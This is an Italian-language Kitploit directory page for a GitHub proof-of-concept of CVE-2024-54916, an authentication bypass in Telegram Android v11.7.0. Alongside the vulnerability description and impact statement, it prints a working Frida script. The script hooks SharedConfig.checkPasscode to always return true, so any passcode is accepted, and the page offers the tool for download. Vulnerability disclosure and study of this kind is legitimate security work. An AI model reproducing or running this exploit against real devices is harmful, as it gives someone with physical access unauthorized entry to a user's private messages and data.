Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-54916 — Frida-based proof-of-concept che dimostra il bypass dell'autenticazione in Telegram Android agganciando SharedConfig.checkPasscode per restituire sempre true, consentendo l'accesso non autorizzato. | Kitploit
Strumenti/GitHubGitHub/sahalll/cve-2024-54916
Sicurezza AndroidAnalisi Dinamica (Sandboxing)Analisi delle VulnerabilitàExploitSicurezza MobileAnalisi di BinariAutenticazione
GitHubsahalll/cve-2024-54916

CVE-2024-54916

Frida-based proof-of-concept che dimostra il bypass dell'autenticazione in Telegram Android agganciando SharedConfig.checkPasscode per restituire sempre true, consentendo l'accesso non autorizzato.

Vedi Repository
51 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-54916: Bypass dell'autenticazione su Telegram apk

Un problema nella classe SharedConfig di Telegram Android APK v.11.7.0 consente a un attaccante fisicamente vicino di bypassare l'autenticazione e aumentare i privilegi manipolando il valore restituito dal metodo checkPasscode.

Tipo di vulnerabilità

Bypass dell'autenticazione

Fornitore del prodotto

Telegram

Base del codice prodotto affetto

Telegram android apk v.11.7.0

Componente affetto

org.telegram.messenger.SharedConfig

Sfruttamento

Identificare la classe e il metodo bersaglio:

  • La classe SharedConfig nell'applicazione gestisce la logica per la verifica del passcode.
  • Il metodo checkPasscode all'interno di questa classe è responsabile di determinare la validità del passcode inserito.

Agganciare il metodo usando Frida

  • Viene utilizzato uno script Frida per agganciare il metodo checkPasscode nella classe SharedConfig. L'implementazione del metodo viene modificata per restituire sempre true, bypassando la validazione effettiva del passcode.

Esecuzione

  • Lo script Frida viene eseguito mentre l'app è in esecuzione (dinamicamente). Qualsiasi passcode inserito dall'utente verrà accettato come valido, consentendo l'accesso non autorizzato.

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

Link video POC:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

Impatto:-

Questa vulnerabilità è un problema di bypass dell'autenticazione lato client. Colpisce gli utenti che si affidano alla funzionalità del passcode per proteggere dati sensibili o limitare l'accesso a funzionalità specifiche dell'app. Sfruttando questa falla, un attaccante fisicamente vicino può manipolare il processo di verifica del passcode, bypassare l'autenticazione e ottenere accesso non autorizzato ad aree protette dell'app. Ciò potrebbe portare all'esposizione di dati sensibili dell'utente o ad azioni non autorizzate all'interno dell'applicazione.

Scarica lo strumento